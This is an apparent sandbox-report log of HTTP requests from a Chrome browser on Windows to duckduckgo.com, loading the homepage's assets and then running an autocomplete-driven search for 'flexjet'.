        Source: global trafficHTTP traffic detected: GET /_next/data/B-ys9soUGnFD59xVO_HFJ/about.json HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/firefox-lg.8efad702.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/edge-lg.36af7682.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/media/opera-lg.237c4418.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/email-protection-ios-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/css/cbe9deb940241e83.css HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /_next/static/css/f9b91cd30bc88454.css HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-mobile-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=f&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=f&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=fl&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=fl&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flex&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexj&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjje&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjje&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjjet&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjjet&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjj&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjj&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexj&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexj&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexje&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexje&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjet&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /ac/?q=flexjet&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /?t=h_&q=flexjet HTTP/1.1host: duckduckgo.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: same-originsec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
        Source: global trafficHTTP traffic detected: GET /dist/s.00b702c7f6728817f85f.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /dist/r.afc03c5e103c89381710.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /dist/wpl.main.6bf3d4a38a64f0f5c871.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /dist/wpl.vendors.15a9724ad11a243a515a.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /font/ProximaNova-Reg-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /font/ProximaNova-Sbold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/b.65e6032da5acb575394e.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/lib/l.32113981e35aa54fc221.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/locale/en_US.a01e3360b693943fa2029a43691ed16e.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/util/u.ad8bd89133253d1e4be1.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/wpmv.fd0532aedd875dd2e193.js HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/wpm.main.376f82d164a97d9b2397.js HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/d.21c0e9dd3ab39dcc7aea.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /dist/g.ff31a455611570db97a7.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /assets/logo_header.v109.svg HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
